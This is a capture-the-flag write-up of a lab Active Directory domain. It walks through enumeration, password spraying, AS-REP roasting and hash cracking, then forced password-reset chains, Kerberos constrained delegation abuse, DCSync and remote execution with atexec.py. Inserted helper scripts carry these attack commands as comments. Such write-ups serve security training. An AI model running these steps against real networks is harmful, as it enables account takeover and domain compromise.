Difficulty: Hard
Step into the shoes of a red teamer in our simulated hack challenge! Navigate a realistic organizational environment with up-to-date defenses.
Test your penetration skills, bypass security measures, and infiltrate into the system. Will you emerge victorious as you simulate the ultimate organization APT?
Find all the flags!
Initial Enumeration #
Network Scan (cleaned output) #
┌──(parallels㉿Kali)-[~/targets/Reset]
└─$ cat scan.txt
# Nmap 7.98 scan initiated Tue Jan 27 20:06:23 2026 as: /usr/lib/nmap/nmap --privileged -vvv -p 53,88,139,135,389,445,464,593,636,3269,3268,3389,7680,9389,49669,49670,49673,49671,49675,49700,49695 -4 -sC -sV -A -oN scan.txt 10.82.173.170
Nmap scan report for 10.82.173.170
Host is up, received echo-reply ttl 126 (0.12s latency).
Scanned at 2026-01-27 20:06:24 EST for 111s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-01-28 01:06:31Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: HAYSTACK
| DNS_Domain_Name: thm.corp
| DNS_Computer_Name: HayStack.thm.corp
| DNS_Tree_Name: thm.corp
| Product_Version: 10.0.17763
|_ System_Time: 2026-01-28T01:07:31+00:00
|_ssl-date: 2026-01-28T01:08:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Issuer: commonName=HayStack.thm.corp
7680/tcp open pando-pub? syn-ack ttl 126
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
49669/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49695/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 27 20:08:15 2026 -- 1 IP address (1 host up) scanned in 112.56 seconds
Key Observations:
- Domain Controller identified: HAYSTACK.thm.corp
- Active Directory services exposed (Kerberos, LDAP, SMB, RPC)
- Windows Server 2019 (Build 17763)
SMB & Domain Enumeration #
Enum4Linux-ng #
┌──(parallels㉿Kali)-[~/targets/Reset]
└─$ enum4linux-ng -A 10.82.173.170 -oA results.txt
ENUM4LINUX - next generation (v1.3.7)
==========================
| Target Information |
==========================
[*] Target ........... 10.82.173.170
[*] Username ......... ''
[*] Random Username .. 'asgknuzf'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
======================================
| Listener Scan on 10.82.173.170 |
======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=====================================================
| Domain Information via LDAP for 10.82.173.170 |
=====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: thm.corp
============================================================
| NetBIOS Names and Workgroup/Domain for 10.82.173.170 |
============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
==========================================
| SMB Dialect Check on 10.82.173.170 |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.0.2: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
============================================================
| Domain Information via SMB session for 10.82.173.170 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: HAYSTACK
NetBIOS domain name: THM
DNS domain: thm.corp
FQDN: HayStack.thm.corp
Derived membership: domain member
Derived domain: THM
==========================================
| RPC Session Check on 10.82.173.170 |
==========================================
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
[*] Check for guest access
[+] Server allows authentication via username 'asgknuzf' and password ''
[H] Rerunning enumeration with user 'asgknuzf' might give more results
====================================================
| Domain Information via RPC for 10.82.173.170 |
====================================================
[+] Domain: THM
[+] Domain SID: S-1-5-21-1966530601-3185510712-10604624
[+] Membership: domain member
================================================
| OS Information via RPC for 10.82.173.170 |
================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
======================================
| Users via RPC on 10.82.173.170 |
======================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
=======================================
| Groups via RPC on 10.82.173.170 |
=======================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
=======================================
| Shares via RPC on 10.82.173.170 |
=======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
==========================================
| Policies via RPC for 10.82.173.170 |
==========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
==========================================
| Printers via RPC for 10.82.173.170 |
==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Key Findings:
- Null session allowed
- Guest access allowed
- Domain SID disclosed
The guest access finding made me check SMB shares next, since a guest session that is rejected by RPC can still be allowed to read shares.
SMB Guest Access #
Using nxc, SMB guest authentication was confirmed.

Let's connect and list the shares.

There is a share named “Data”, so I connected to it as guest.

Downloading the text file from the share revealed the onboarding e-mail, including a default password:
┌──(parallels㉿Kali)-[~/targets/Reset]
└─$ cat 25tfl3fw.yqn.txt
Subject: Welcome to Reset

Dear <USER>,

Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. **Please keep this information confidential and do not share it with anyone. The initial passowrd is: ResetMe123!** We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.

Best regards,
The Reset Team

The onboarding mail gives us a default password, ResetMe123!, that is handed to every new account, so it is a strong spray candidate for any accounts we can find. Now that we have a password, let's build a user list so that we can spray it.
Building a user list #
We notice we cannot list users directly with the rpcclient enumdomusers command; it returns STATUS_ACCESS_DENIED, as enum4linux-ng already showed.

Direct RPC enumeration failed, so I fell back to RID brute forcing: the domain SID disclosed by enum4linux-ng is combined with candidate RIDs, and each SID is resolved to a name over LSARPC, which the null/guest session does allow.
Impacket's lookupsid.py script does exactly this.


After cleaning the output, I identified 42 domain users.
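The cleanup step above is easy to get wrong (groups, the machine account and krbtgt all appear in the same output). The following is an added example, not code from the original writeup: it parses raw lookupsid.py output into a spray-ready user list. The sample output is constructed for the example (the RIDs and their order are made up; only the account names already mentioned on this page are real), and the lookupsid.py and nxc invocations in the comments are assumed, typical command lines rather than ones shown on the page.

```shell
#!/bin/sh
# Added example (not from the original writeup): turn raw lookupsid.py output
# into a clean user list for password spraying.
# Assumed collection command (not shown on the page):
#   lookupsid.py -no-pass 'thm.corp/guest@10.82.173.170' > lookupsid.txt

# Constructed sample of lookupsid.py output. RIDs and ordering are made up.
SAMPLE_LOOKUPSID="$(mktemp)"
cat > "$SAMPLE_LOOKUPSID" <<'EOF'
[*] Brute forcing SIDs at 10.82.173.170
[*] StringBinding ncacn_np:10.82.173.170[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1966530601-3185510712-10604624
498: THM\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: THM\Administrator (SidTypeUser)
501: THM\Guest (SidTypeUser)
502: THM\krbtgt (SidTypeUser)
512: THM\Domain Admins (SidTypeGroup)
1000: THM\HAYSTACK$ (SidTypeUser)
1104: THM\automate (SidTypeUser)
1105: THM\LILY_ONEILL (SidTypeUser)
1106: THM\TABATHA_BRITT (SidTypeUser)
EOF

# Print the sAMAccountName of every SidTypeUser entry, dropping machine
# accounts (trailing '$') and krbtgt, neither of which is worth spraying.
users_from_lookupsid() {
    grep '(SidTypeUser)$' "$1" \
        | sed -E 's/^[0-9]+: [^\\]+\\(.*) \(SidTypeUser\)$/\1/' \
        | grep -v '\$$' \
        | grep -vi '^krbtgt$'
}

# Write a de-duplicated user list to $2 and return the number of accounts in it.
build_userlist() {
    users_from_lookupsid "$1" | sort -u > "$2"
    wc -l < "$2" | tr -d ' '
}

USERS_FILE="$(mktemp)"
echo "users in list: $(build_userlist "$SAMPLE_LOOKUPSID" "$USERS_FILE")"

# Spray the onboarding password against SMB with the list (network step, assumed
# NetExec flags; run it only against the lab target and mind the lockout policy):
#   nxc smb 10.82.173.170 -u "$USERS_FILE" -p 'ResetMe123!' --continue-on-success
```

On the constructed sample the list contains five accounts; the group entries, the HAYSTACK$ machine account and krbtgt are dropped. Check the domain lockout threshold (enum4linux-ng's policy check was denied here, so query it once you have a valid account) before spraying more than one password.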
Credential Attacks #
With our user list, we can spray the default password we found against SMB logins.

We get a successful login for the user LiLy_Oneill:ResetMe123!
AS-REP Roasting #
I also tried AS-REP roasting our user list and found 3 accounts with Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH), so their AS-REP hashes were dumped. Pre-authentication is what normally stops this: an account that requires it never returns an AS-REP encrypted with its password hash to an unauthenticated requester.
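The following is an added example, not code from the original writeup. It shows the two checks behind this step: which accounts are roastable (the DONT_REQ_PREAUTH bit, 0x400000, in userAccountControl) and how to pull the resulting hashes into a hashcat-ready file. Both inputs are constructed: the ldapsearch-style records use shortened DNs and made-up userAccountControl values, and the GetNPUsers.py output contains a placeholder hash body, not a real AS-REP. The ldapsearch, GetNPUsers.py and hashcat command lines in the comments are assumed, typical invocations.

```shell
#!/bin/sh
# Added example (not from the original writeup): find AS-REP roastable accounts
# and extract the hashes for cracking.
# An account is roastable only if UF_DONT_REQUIRE_PREAUTH (0x400000 = 4194304)
# is set in its userAccountControl. Assumed LDAP query for the same thing:
#   ldapsearch -x -H ldap://10.82.173.170 -D '<user>@thm.corp' -w '<password>' \
#     -b 'DC=thm,DC=corp' \
#     '(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' \
#     sAMAccountName userAccountControl

# Constructed ldapsearch-style output. 4260352 = 0x410200 =
# DONT_REQ_PREAUTH | DONT_EXPIRE_PASSWD | NORMAL_ACCOUNT; 66048 = 0x10200 (no pre-auth bit).
SAMPLE_LDAP="$(mktemp)"
cat > "$SAMPLE_LDAP" <<'EOF'
dn: CN=TABATHA_BRITT,DC=thm,DC=corp
sAMAccountName: TABATHA_BRITT
userAccountControl: 4260352

dn: CN=LILY_ONEILL,DC=thm,DC=corp
sAMAccountName: LILY_ONEILL
userAccountControl: 66048
EOF

# Print accounts whose UAC has the DONT_REQ_PREAUTH bit set. POSIX awk has no
# bitwise operators, so bit 22 is tested as "floor(uac / 2^22) is odd".
asrep_candidates() {
    awk -v flag=4194304 '
        /^dn: /                 { name = ""; uac = "" }
        /^sAMAccountName: /     { name = $2 }
        /^userAccountControl: / { uac = $2 + 0 }
        name != "" && uac != "" {
            if (int(uac / flag) % 2 == 1) print name
            name = ""; uac = ""
        }' "$1"
}

# Constructed GetNPUsers.py output; the hex after the colon is a placeholder.
# Assumed real command:
#   GetNPUsers.py thm.corp/ -usersfile users.txt -format hashcat \
#     -dc-ip 10.82.173.170 -outputfile asrep.txt
SAMPLE_NPUSERS="$(mktemp)"
cat > "$SAMPLE_NPUSERS" <<'EOF'
[-] User LILY_ONEILL doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$TABATHA_BRITT@THM.CORP:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
EOF

# Keep only etype-23 AS-REP hashes (hashcat mode 18200); drop status lines.
asrep_hashes() {
    grep '^\$krb5asrep\$23\$' "$1"
}

echo "roastable accounts:"
asrep_candidates "$SAMPLE_LDAP"
echo "hashes for hashcat:"
asrep_hashes "$SAMPLE_NPUSERS"
# Crack offline (assumed wordlist path):
#   hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
```

On the constructed input only TABATHA_BRITT is reported as roastable and exactly one hash line survives the filter. The UAC test is the same one the LDAP bitwise matching rule performs server-side; running it client-side is useful when you only have a dump and no live bind.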

Cracking the hashes with rockyou.txt yielded valid credentials:

TABATHA_BRITT@THM.CORP:marlboro(1985)

So far we have two valid users with credentials:
TABATHA_BRITT@THM.CORP:marlboro(1985)
LILY_ONEILL@THM.CORP:ResetMe123!

Next, I want to find the user flag.
Initial Access #
RDP access as TABATHA_BRITT was successful, but no user flag was present.

After searching widely, I found no user flag under TABATHA_BRITT, so I tried to RDP as LILY_ONEILL, which did not work because her password had expired.

Rabbit hole #
When I saw the password expiry, the credential being ResetMe, and the room being named Reset, I thought I should try resetting Lily's password to see if we could gain access that way.
It did not work.

Privilege Escalation #
After giving up on finding the user flag (TABATHA_BRITT had no desktop), I hosted PrivescCheck.ps1 on my attacker machine and downloaded it onto the target.

I then ran PrivescCheck.ps1.

key finding

A misconfiguration is present where cleartext credentials are stored in the registry, readable by any local user. We now have credentials for the user automate:Passw0rd1, so let's impersonate this user with the credentials we found.

Now that we are logged in as automate, let's get user.txt.

Perfect, we have our first flag. Now it's time to get SYSTEM.
Active Directory Attack Path Discovery #
With a foothold established, and our first flag found, I pivoted to BloodHound for attack path analysis.
I used SharpHound to collect data from the target as the automate user.

The TryHackMe connection unexpectedly reset and the target's new IP was 10.80.168.201,
but BloodHound showed a clear path to Administrator from a user we own.

After selecting our owned user as the start node and the Administrator user as the end goal, we found a direct attack path: force-reset a chain of user passwords, then abuse the delegation rights of DARLA_WINTERS to obtain the Administrator account.
Discovered Privilege Escalation Chain #
1. owned user -> GenericAll -> SHAWNA_BRAY
2. SHAWNA_BRAY -> ForceChangePassword + WriteAccountRestrictions on CRUZ_HALL
3. CRUZ_HALL -> GenericWrite + ForceChangePassword on DARLA_WINTERS
4. DARLA_WINTERS -> AllowedToDelegate to HAYSTACK
5. HAYSTACK can CoerceToTGT from THM.CORP (Kerberos Delegation)
6. Leads to impersonation of ADMINISTRATOR
Password Reset & Impersonation Chain #
Let's change SHAWNA_BRAY's password (GenericAll includes the right to reset it) and then impersonate her by using runas to open a shell.

Now let's use our shell as SHAWNA_BRAY to reset CRUZ_HALL's password, then impersonate him using the same method.

Now we use our shell as CRUZ_HALL to reset DARLA_WINTERS's password and impersonate her the same way.

Now we can abuse DARLA_WINTERS's delegation privileges to impersonate the Administrator user. Keep in mind that each forced reset locks the legitimate owner out and is logged on the DC as event ID 4724 (an attempt was made to reset an account's password), so this chain is fine in a lab but very noisy in a real engagement.
Abusing Kerberos Constrained Delegation #
Let's verify the user's delegation rights first. The AllowedToDelegate edge in the BloodHound path means DARLA_WINTERS has msDS-AllowedToDelegateTo populated with a service on HAYSTACK, i.e. classic constrained delegation configured on the user object. Resource-based constrained delegation (RBCD) is a different thing: it is configured on the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute and shows up in BloodHound as an AllowedToAct edge.
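The following is an added example, not code from the original writeup. It reads a user's constrained-delegation configuration from ldapsearch-style output and reports, per target SPN, whether protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION, 0x1000000) is enabled; that bit is what makes an S4U2self ticket forwardable, and without it the S4U2proxy step behind getST.py -impersonate fails. The records are constructed (shortened DNs, made-up userAccountControl values, and a hypothetical second account svc_example that does not exist on the page), and the ldapsearch, getST.py and atexec.py command lines in the comments are assumed, typical invocations using the post-reset IP 10.80.168.201.

```shell
#!/bin/sh
# Added example (not from the original writeup): inspect constrained delegation.
# Two attributes decide whether the getST.py impersonation will work:
#   msDS-AllowedToDelegateTo   - SPNs the account may request tickets for
#   userAccountControl 0x1000000 (TRUSTED_TO_AUTH_FOR_DELEGATION, 16777216)
#                              - protocol transition; without it S4U2self yields
#                                a non-forwardable ticket and S4U2proxy is refused
# Assumed collection command:
#   ldapsearch -x -H ldap://10.80.168.201 -D 'automate@thm.corp' -w 'Passw0rd1' \
#     -b 'DC=thm,DC=corp' '(msDS-AllowedToDelegateTo=*)' \
#     sAMAccountName userAccountControl msDS-AllowedToDelegateTo

# Constructed sample. 16843264 = 0x1010200 = TRUSTED_TO_AUTH_FOR_DELEGATION |
# DONT_EXPIRE_PASSWD | NORMAL_ACCOUNT; svc_example is hypothetical.
SAMPLE_DELEG="$(mktemp)"
cat > "$SAMPLE_DELEG" <<'EOF'
dn: CN=DARLA_WINTERS,DC=thm,DC=corp
sAMAccountName: DARLA_WINTERS
userAccountControl: 16843264
msDS-AllowedToDelegateTo: cifs/HayStack.thm.corp
msDS-AllowedToDelegateTo: cifs/HayStack

dn: CN=svc_example,DC=thm,DC=corp
sAMAccountName: svc_example
userAccountControl: 66048
msDS-AllowedToDelegateTo: ldap/HayStack.thm.corp
EOF

# One line per (account, target SPN) with the protocol-transition verdict.
# The bit test is "floor(uac / 2^24) is odd" because POSIX awk lacks bitwise ops.
delegation_rights() {
    awk -v t2a4d=16777216 '
        function flush(   i, pt) {
            if (n == 0) return
            pt = (int(uac / t2a4d) % 2 == 1) ? "yes" : "no"
            for (i = 1; i <= n; i++)
                print name " -> " spn[i] " (protocol transition: " pt ")"
            n = 0
        }
        /^dn: /                       { flush(); name = ""; uac = 0 }
        /^sAMAccountName: /           { name = $2 }
        /^userAccountControl: /       { uac = $2 + 0 }
        /^msDS-AllowedToDelegateTo: / { spn[++n] = $2 }
        END                           { flush() }
    ' "$1"
}

delegation_rights "$SAMPLE_DELEG"

# With protocol transition confirmed, request a CIFS ticket as Administrator
# (S4U2self + S4U2proxy) and use it. Network steps, assumed flags; <pw> is the
# password set during the reset chain, and HayStack.thm.corp must resolve on the
# attacker box (e.g. an /etc/hosts entry) because the ticket is bound to that name.
#   getST.py -spn cifs/HayStack.thm.corp -impersonate Administrator \
#     -dc-ip 10.80.168.201 'thm.corp/DARLA_WINTERS:<pw>'
#   export KRB5CCNAME=Administrator@cifs_HayStack.thm.corp@THM.CORP.ccache
#   atexec.py -k -no-pass thm.corp/Administrator@HayStack.thm.corp whoami
```

On the constructed input both of DARLA_WINTERS's SPNs are reported with protocol transition enabled, while the hypothetical svc_example is not; for an account like svc_example you would need a ticket from the victim user themselves, or RBCD, rather than -impersonate. Note that the SPN you request must be one listed in msDS-AllowedToDelegateTo: cifs/ gets you SMB and the scheduled-task pipe that atexec.py uses, whereas other services on the same host would be refused.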

Using Impacket's getST.py, I leveraged DARLA_WINTERS's constrained delegation rights (an S4U2self request for Administrator followed by S4U2proxy) to impersonate the Administrator account and obtain a CIFS service ticket for the HAYSTACK host.

Now we point KRB5CCNAME at the ccache file so that Impacket tools pick the ticket up:
export KRB5CCNAME=administrator@cifs_HAYSTACK.thm.corp@THM.CORP.ccache

Domain compromise #
A DCSync was attempted with the ticket and succeeded.

But logon restrictions prevented a direct interactive login, specifically time-of-day (logon hours) restrictions on the account.

So instead I used remote command execution via atexec.py.
This useful Impacket tool executes commands on a remote Windows system by creating and running a scheduled task over SMB/RPC (the ATSVC named pipe), which needs only the CIFS service ticket we already hold.

Now that we have command execution as Administrator, we check whether the root flag is in its standard location, as it is in most CTFs.

And we successfully find the root flag.
Conclusion & Takeaways #
This was an excellent Active Directory lab that focused on:
- Enumeration over exploitation
- Credential hygiene failures
- Password reuse risks
- Delegation misconfigurations
- Realistic lateral movement
No single vulnerability led to compromise; it is the chain of weaknesses that matters most. This mirrors real enterprise breaches and reinforces why privilege relationships must be audited continuously.